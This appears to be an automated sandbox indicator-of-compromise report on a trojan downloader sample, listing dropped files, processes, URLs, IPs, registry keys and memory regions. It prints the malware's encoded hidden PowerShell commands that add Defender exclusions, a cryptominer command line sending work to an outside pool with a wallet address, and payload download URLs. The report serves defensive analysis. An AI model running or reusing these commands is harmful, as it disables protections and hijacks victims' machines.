IOC Report
SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe

loading gif

Files

File Path
Type
Category
Malicious
SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\fdyryi.exe
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AlgorithmType.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\aspnet_compiler.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fdyryi.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Keywords.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pjmskbbdr.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41po2hem.my2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dfxx40n0.l1j.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hhivkjpp.r5w.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iisdehwr.szc.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_liowm0cl.oxj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n5t3j3ud.m4x.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rkxaqjkf.jli.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tpppzsc3.1p3.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_twqyckxm.pyb.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u5xkch25.hne.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xtvbw3dl.00r.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xtx5jlav.1lx.ps1
ASCII text, with no line terminators
dropped
There are 16 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe"
malicious
C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe
"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGIAcgBvAGsAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABLAGUAeQB3AG8AcgBkAHMALgBlAHgAZQA7AA==
malicious
C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe
C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe
malicious
C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe
"C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGIAcgBvAGsAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsACwAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABLAGUAeQB3AG8AcgBkAHMALgBlAHgAZQA7AA==
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
malicious
C:\Users\user\AppData\Local\Temp\fdyryi.exe
C:\Users\user\AppData\Local\Temp\fdyryi.exe
malicious
C:\Users\user\AppData\Local\Temp\fdyryi.exe
"C:\Users\user\AppData\Local\Temp\fdyryi.exe"
malicious
C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe
C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGIAcgBvAGsAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE4AYQBtAGUAZABQAGUAcgBtAGkAcwBzAGkAbwBuAFMAZQB0AHMAXABBAGwAZwBvAHIAaQB0AGgAbQBUAHkAcABlAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAYgByAG8AawBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAIAAtAEYAbwByAGMAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABiAHIAbwBrAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABOAGEAbQBlAGQAUABlAHIAbQBpAHMAcwBpAG8AbgBTAGUAdABzAFwAQQBsAGcAbwByAGkAdABoAG0AVAB5AHAAZQAuAGUAeABlAA==
malicious
C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe
C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe
malicious
C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe
"C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe"
malicious
C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe
"C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
malicious
C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe
"C:\Users\user\AppData\Local\Temp\pjmskbbdr.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 91.92.246.62:39005 -u ZEPHYR3aJa7ZSZrgUcNCWyDb7gCYGVrMsacmxB3psE2TXsoq7wsZU1WdWheFCfaKvLCLc4VHzZdzvA8NfmwfW133Smqm93PzMze4T.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 91.92.246.62:39005 -u ZEPHYR3aJa7ZSZrgUcNCWyDb7gCYGVrMsacmxB3psE2TXsoq7wsZU1WdWheFCfaKvLCLc4VHzZdzvA8NfmwfW133Smqm93PzMze4T.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 14 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://juytlioojbni.duckdns.org/byfronbypass.html/css/mss/plugin3.dll
91.92.246.15
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://juytlioojbni.duckdns.org/byfronbypass.html/css/mss/Gkwyrkfwp.pdf
91.92.246.15
malicious
http://juytlioojbni.duckdns.org/byfronbypass.html/css/mss/mirtn.exe
91.92.246.15
malicious
http://juytlioojbni.duckdns.org/byfronbypass.html/css/mss/Wsrszrqqkm.vdf
91.92.246.15
malicious
http://juytlioojbni.duckdns.org
unknown
https://stackoverflow.com/q/14436606/23354
unknown
https://github.com/mgravell/protobuf-netJ
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd
unknown
https://github.com/mgravell/protobuf-net
unknown
http://schemas.microsoft.c
unknown
https://github.com/Pester/Pester
unknown
http://bnfjdbhgo.duckdns.org/byfronbypass.html/css/mss/Uuanez.pdfPDY
unknown
http://schemas.microso
unknown
https://github.com/mgravell/protobuf-neti
unknown
https://stackoverflow.com/q/11564914/23354;
unknown
https://stackoverflow.com/q/2152978/23354
unknown
http://juytlioojbni.duckdns.org/byfronbypass.html/css/mss/Gkwyrkfwp.pdf1Y
unknown
http://bnfjdbhgo.duckdns.org/byfronbypass.html/css/mss/Uuanez.pdf
91.92.254.152
http://schemas.xmlsoap.org/wsdl/
unknown
https://aka.ms/pscore68
unknown
http://bnfjdbhgo.duckdns.org
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://bnfjdbhgo.duckdns.org/byfronbypass.html/css/mss/utr32.exe
91.92.254.152
There are 16 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
bnfjdbhgo.duckdns.org
91.92.254.152
malicious
juytlioojbni.duckdns.org
91.92.246.15
malicious
miliutyhgdue.duckdns.org
91.92.253.47
malicious
bg.microsoft.map.fastly.net
199.232.214.172

IPs

IP
Domain
Country
Malicious
91.92.253.47
miliutyhgdue.duckdns.org
Bulgaria
malicious
91.92.246.62
unknown
Bulgaria
malicious
91.92.246.15
juytlioojbni.duckdns.org
Bulgaria
malicious
91.92.254.152
bnfjdbhgo.duckdns.org
Bulgaria
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\SecuriteInfo_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Keywords_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\MSBuild_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\2CA6B225A03FE0F8D9F1
2CA6B225A03FE0F8D9F1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\fdyryi_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\AlgorithmType_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\aspnet_compiler_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\9b6048d01894c73222f12c43ae5e9503
dffe8a8e105854fd8f7fee0c03f26e14
HKEY_CURRENT_USER\SOFTWARE\9b6048d01894c73222f12c43ae5e9503
F09CA6523A09C809FF28661ACBD77D06
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\pjmskbbdr_RASMANCS
FileDirectory
There are 92 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2B8B000
trusted library allocation
page read and write
malicious
34A1000
trusted library allocation
page read and write
malicious
402000
remote allocation
page execute and read and write
malicious
2BDF000
trusted library allocation
page read and write
malicious
1A946430000
trusted library section
page read and write
malicious
20541A55000
trusted library allocation
page read and write
malicious
205313C1000
trusted library allocation
page read and write
malicious
2E0B000
trusted library allocation
page read and write
malicious
29A74620000
trusted library section
page read and write
malicious
1B806521000
trusted library allocation
page read and write
malicious
1A956C49000
trusted library allocation
page read and write
malicious
205312B0000
trusted library section
page read and write
malicious
2AFD000
trusted library allocation
page read and write
malicious
57A0000
trusted library section
page read and write
malicious
1A956BA9000
trusted library allocation
page read and write
malicious
459A000
trusted library allocation
page read and write
malicious
205419DC000
trusted library allocation
page read and write
malicious
3FC2000
trusted library allocation
page read and write
malicious
2BCE000
trusted library allocation
page read and write
malicious
3281000
trusted library allocation
page read and write
malicious
154E5C11000
trusted library allocation
page read and write
malicious
31DC000
trusted library allocation
page read and write
malicious
154F6028000
trusted library allocation
page read and write
malicious
29A001B1000
trusted library allocation
page read and write
malicious
299E000
trusted library allocation
page read and write
malicious
3E70000
trusted library allocation
page read and write
malicious
42EC000
trusted library allocation
page read and write
malicious
7050000
trusted library section
page read and write
malicious
3E19000
trusted library allocation
page read and write
malicious
31DB000
trusted library allocation
page read and write
malicious
41A2000
trusted library allocation
page read and write
malicious
4110000
trusted library allocation
page read and write
malicious
29A10538000
trusted library allocation
page read and write
malicious
402000
remote allocation
page execute and read and write
malicious
473E000
trusted library allocation
page read and write
malicious
1404A8000
remote allocation
page execute and read and write
malicious
205418DF000
trusted library allocation
page read and write
malicious
32ED000
trusted library allocation
page read and write
malicious
4062000
trusted library allocation
page read and write
malicious
1407C2000
remote allocation
page execute and read and write
malicious
1A956B55000
trusted library allocation
page read and write
malicious
205417C2000
trusted library allocation
page read and write
malicious
3E97000
trusted library allocation
page read and write
malicious
29A74360000
trusted library section
page read and write
malicious
1A946511000
trusted library allocation
page read and write
malicious
20541AF9000
trusted library allocation
page read and write
malicious
4158000
trusted library allocation
page read and write
malicious
4CBE000
trusted library allocation
page read and write
malicious
5520000
trusted library section
page read and write
malicious
5DE0000
trusted library section
page read and write
malicious
2C44000
trusted library allocation
page read and write
malicious
3C70000
trusted library allocation
page read and write
malicious
2EB1000
trusted library allocation
page read and write
malicious
140493000
remote allocation
page execute and read and write
malicious
20541A09000
trusted library allocation
page read and write
malicious
140000000
remote allocation
page execute and read and write
malicious
1B8168E8000
trusted library allocation
page read and write
malicious
46DE000
trusted library allocation
page read and write
malicious
3123000
trusted library allocation
page read and write
malicious
28625FF000
stack
page read and write
205413C1000
trusted library allocation
page read and write
2053180B000
trusted library allocation
page read and write
E1A90F9000
stack
page read and write
1A9467A9000
trusted library allocation
page read and write
30D3000
trusted library allocation
page read and write
4807000
trusted library allocation
page read and write
20541712000
trusted library allocation
page read and write
30A5000
trusted library allocation
page read and write
6103000
heap
page read and write
49B6000
trusted library allocation
page read and write
296B4C6E000
trusted library allocation
page read and write
B50000
trusted library allocation
page read and write
20541B93000
trusted library allocation
page read and write
1620000
trusted library allocation
page read and write
2EA0000
heap
page read and write
2B1A000
trusted library allocation
page read and write
7FF7C1110000
trusted library allocation
